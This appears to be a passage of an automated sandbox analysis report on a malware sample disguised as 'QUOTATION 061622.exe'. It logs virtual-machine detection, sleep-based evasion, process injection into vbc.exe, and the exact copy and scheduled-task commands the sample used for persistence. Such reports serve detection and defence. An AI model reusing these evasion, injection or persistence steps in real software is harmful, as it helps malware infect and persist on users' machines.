                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe TID: 5948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3596Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 6784Thread sleep count: 35 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 6784Thread sleep time: -35000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 6692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7060Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7060Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 6224Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 3303Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2597Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: tmpF05D.tmp.5.drBinary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
                        Source: vbc.exe, 00000015.00000002.701850058.000000000A2CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: vbc.exe, 00000015.00000002.701850058.000000000A2CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareYTNFO449Win32_VideoControllerK6ZKDALEVideoController120060621000000.000000-00099.6072.display.infMSBDALW7XN8VTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsUZ7_6S26l
                        Source: vbc.exe, 00000015.00000002.698007004.000000000723C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 56AA008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 8D1008Jump to behavior
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeQueries volume information: C:\Users\user\Desktop\QUOTATION 061622.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
